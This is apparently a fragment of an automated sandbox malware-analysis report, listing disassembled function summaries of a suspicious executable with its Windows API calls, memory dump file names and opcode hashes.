                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE3A948: HeapFree.KERNEL32(?,?,?,00007FF6AAE42D22,?,?,?,00007FF6AAE42D5F,?,?,00000000,00007FF6AAE43225,?,?,?,00007FF6AAE43157), ref: 00007FF6AAE3A95E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE3A948: GetLastError.KERNEL32(?,?,?,00007FF6AAE42D22,?,?,?,00007FF6AAE42D5F,?,?,00000000,00007FF6AAE43225,?,?,?,00007FF6AAE43157), ref: 00007FF6AAE3A968
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6AAE2CBA5), ref: 00007FF6AAE39064
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe, xrefs: 00007FF6AAE39052
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                                • API String ID: 3580290477-3206695957
                                                                                                                                                                                                                                • Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                • Instruction ID: a6bb9089be28cfcd7c644ecae53a99468f168a23371b968a1db4559053d68818
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11418132A0AA42C5EB15EF21D4500BCA7A4FF447D0B5540B6EA8E93BA5DF3DE8929310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                • Instruction ID: 7d0310718f451ef5da52cb25d1ff45fda5418a4bba3f1105981a2ca76f882bfa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F41E532B19A41C2DB61AF25E4443AAA7A4FB88784F804032EE8DC7794DF3DD446E750
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                • Opcode ID: efdca0e5d1be44ae5d3d1eb4e4dfe397437606097ef32224e0533ff711b04112
                                                                                                                                                                                                                                • Instruction ID: cfc11519bf2bd33e36c1dac51bab0471fb6c67cc40ca41636a457c090896a8df
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efdca0e5d1be44ae5d3d1eb4e4dfe397437606097ef32224e0533ff711b04112
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C212872A09781C2FB20AB12D04427DB3B5FB84B84F45407AD6CD872A4CF7DD9469790
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                • Instruction ID: 746ab750af7a1998b184b5bd7ad43fe15c497a75a5eea0ca2782b71b0df8ec04
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F501DF32919203C2F761BF60946927E63A0FF88385F800077D54CC7291DF2DE406AB15